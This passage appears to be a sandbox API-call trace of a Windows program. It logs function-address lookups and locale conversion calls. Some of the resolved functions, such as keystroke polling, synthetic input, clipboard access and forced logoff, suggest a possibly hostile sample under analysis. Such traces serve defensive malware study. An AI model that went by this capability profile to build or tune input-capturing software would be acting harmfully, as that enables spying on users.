lpProcName="GetFileTime") returned 0x75ca4407 [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="GetLogicalDrives") returned 0x75ca5371 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="FindFirstFileW") returned 0x75ca4435 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="FindNextFileW") returned 0x75ca54ee [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="RemoveDirectoryW") returned 0x75d244cf [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="FindClose") returned 0x75ca4442 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="SetFileAttributesW") returned 0x75cbd4f7 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="lstrlenA") returned 0x75ca5a4b [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="QueryPerformanceFrequency") returned 0x75ca41f0 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="QueryPerformanceCounter") returned 0x75ca1725 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="OpenEventW") returned 0x75ca15d6 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="CreateEventW") returned 0x75ca183e [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="SetEvent") returned 0x75ca16c5 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="TryEnterCriticalSection") returned 0x77d62500 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="EnterCriticalSection") returned 0x77d522b0 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeCriticalSection") returned 0x77d62c42 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="DeleteCriticalSection") returned 0x77d645f5 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="SetUnhandledExceptionFilter") returned 0x75ca87c9 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileSize") returned 0x75ca196e [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="LocalAlloc") returned 0x75ca168c [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="FileTimeToSystemTime") 
returned 0x75ca542c [0162.672] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentThread") returned 0x75ca17ec [0162.672] GetProcAddress (hModule=0x75c90000, lpProcName="GetSystemInfo") returned 0x75ca49ca [0162.672] GetProcAddress (hModule=0x75c90000, lpProcName="GetComputerNameW") returned 0x75cadd0e [0162.672] GetProcAddress (hModule=0x75c90000, lpProcName="GetSystemTimeAsFileTime") returned 0x75ca3509 [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="TlsSetValue") returned 0x75ca14fb [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="SetThreadPriority") returned 0x75ca32bb [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="ResumeThread") returned 0x75ca43ef [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="DuplicateHandle") returned 0x75ca1886 [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="TlsAlloc") returned 0x75ca49ad [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="CreateSemaphoreW") returned 0x75cbca5a [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="TlsGetValue") returned 0x75ca11e0 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="RaiseException") returned 0x75ca58a6 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="TerminateProcess") returned 0x75cbd802 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="ExitProcess") returned 0x75ca7a10 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentProcessId") returned 0x75ca11f8 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentProcess") returned 0x75ca1809 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="LocalSize") returned 0x75cbe741 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="GlobalCompact") returned 0x75d1efc6 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="GlobalSize") returned 0x75cbd16f [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="GetProcAddress") returned 0x75ca1222 [0162.677] GetProcAddress (hModule=0x75c90000, 
lpProcName="LockResource") returned 0x75ca5959 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="DecodePointer") returned 0x77d69d35 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75ca1916 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="CompareStringW") returned 0x75ca3bca [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="LCMapStringW") returned 0x75ca17b9 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="GetLocaleInfoW") returned 0x75ca3c42 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="GetCPInfo") returned 0x75ca5189 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="UnhandledExceptionFilter") returned 0x75cc772f [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="IsProcessorFeaturePresent") returned 0x75ca5235 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="WaitForSingleObjectEx") returned 0x75ca1151 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="GetStartupInfoW") returned 0x75ca4d40 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="GetLastError") returned 0x75ca11c0 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="CreateDirectoryW") returned 0x75ca4259 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="TerminateThread") returned 0x75ca7a2f [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeSListHead") returned 0x77d694a4 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="RtlUnwind") returned 0x75ccd1c3 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileType") returned 0x75ca3531 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleExW") returned 0x75ca4a6f [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="ExitThread") returned 0x77d8d598 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="FreeLibraryAndExitThread") returned 0x75cbd582 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="HeapAlloc") 
returned 0x77d5e026 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="HeapReAlloc") returned 0x77d71f6e [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="HeapFree") returned 0x75ca14c9 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="GetStdHandle") returned 0x75ca51b3 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="FlushFileBuffers") returned 0x75ca469b [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="GetConsoleCP") returned 0x75d47bff [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="GetConsoleMode") returned 0x75ca1328 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="IsValidLocale") returned 0x75cbce46 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="GetUserDefaultLCID") returned 0x75ca3da5 [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="EnumSystemLocalesW") returned 0x75d2425f [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="SetFilePointerEx") returned 0x75cbc807 [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="ReadConsoleW") returned 0x75d4739a [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="SetStdHandle") returned 0x75d2454f [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="GetProcessHeap") returned 0x75ca14e9 [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="FindFirstFileExA") returned 0x75d2427f [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="FindNextFileA") returned 0x75ccd53e [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="IsValidCodePage") returned 0x75ca4493 [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="GetCommandLineA") returned 0x75ca51a1 [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="GetStringTypeW") returned 0x75ca1946 [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="GetEnvironmentStringsW") returned 0x75ca51e3 [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="FreeEnvironmentStringsW") returned 0x75ca51cb [0162.681] GetProcAddress 
(hModule=0x75c90000, lpProcName="SetEnvironmentVariableA") returned 0x75cae331 [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="WriteConsoleW") returned 0x75cc7aca [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="SetHandleInformation") returned 0x75cb195c [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="HeapSize") returned 0x77d63002 [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="EncodePointer") returned 0x77d70fcb [0162.681] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0162.681] GetProcAddress (hModule=0x76780000, lpProcName="SetClipboardData") returned 0x767d8e57 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="GetUserObjectInformationW") returned 0x76798068 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="SetWindowLongW") returned 0x76798332 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="PostQuitMessage") returned 0x76799abb [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="GetDesktopWindow") returned 0x767a0a19 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="GetCursorPos") returned 0x767a1218 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="VkKeyScanExW") returned 0x767acd66 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="MapVirtualKeyW") returned 0x767c1459 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="GetAsyncKeyState") returned 0x767beb96 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="LoadKeyboardLayoutW") returned 0x767dbb17 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="SendMessageTimeoutW") returned 0x767997d2 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="SystemParametersInfoW") returned 0x767990d3 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="keybd_event") returned 0x767f02bf [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="GetSystemMetrics") returned 0x76797d2f [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="SetThreadDesktop") returned 
0x767a0296 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="GetKeyboardState") returned 0x767bec68 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="ExitWindowsEx") returned 0x767e1497 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="mouse_event") returned 0x767f027b [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="DestroyWindow") returned 0x76799a55 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="CreateWindowExW") returned 0x76798a29 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="RegisterClassExW") returned 0x7679b17d [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="PeekMessageW") returned 0x767a05ba [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="DefWindowProcA") returned 0x77d724e0 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="GetMessageW") returned 0x767978e2 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="PostThreadMessageW") returned 0x76798bff [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="WinHelpW") returned 0x767e8a63 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="LoadImageW") returned 0x7679fbd1 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="LoadCursorA") returned 0x7679dad5 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="GetWindowThreadProcessId") returned 0x767991b4 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="GetClipboardData") returned 0x767d9f1d [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="FindWindowA") returned 0x7679ffe6 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="SetWindowLongA") returned 0x767a6110 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="DrawFocusRect") returned 0x767a89c2 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="GetSysColorBrush") returned 0x767a35a4 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="MessageBeep") returned 0x767ac036 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxA") 
returned 0x767efd1e [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="GetWindowRect") returned 0x76797f34 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="GetWindowTextA") returned 0x767a0029 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="SetWindowTextA") returned 0x767a7aee [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="GetForegroundWindow") returned 0x767a2320 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="SetActiveWindow") returned 0x767a3208 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="DeleteMenu") returned 0x767a6d2a [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="DestroyMenu") returned 0x767a3e26 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="GetMenuState") returned 0x767aa7c1 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="GetMenu") returned 0x767a5041 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="TranslateAcceleratorA") returned 0x767a85e5 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="LoadAcceleratorsA") returned 0x767a84cb [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="KillTimer") returned 0x767979db [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="SetTimer") returned 0x767979fb [0162.687] GetProcAddress (hModule=0x76780000, lpProcName="CharNextA") returned 0x76797a1b [0162.687] GetProcAddress (hModule=0x76780000, lpProcName="CharUpperBuffW") returned 0x7679fc5d [0162.687] GetProcAddress (hModule=0x76780000, lpProcName="IsClipboardFormatAvailable") returned 0x767a8676 [0162.687] GetProcAddress (hModule=0x76780000, lpProcName="SendDlgItemMessageW") returned 0x767bd0f5 [0162.687] GetProcAddress (hModule=0x76780000, lpProcName="IsZoomed") returned 0x767a3332 [0162.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0162.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ee98, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0162.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f874, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x94\xed\x18\xe9\xb0\xfa\x18", lpUsedDefaultChar=0x0) returned 256 [0162.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f974, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0162.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f974, cbMultiByte=256, lpWideCharStr=0x18f0c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0162.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0162.696] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18eeb8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0162.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f774, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
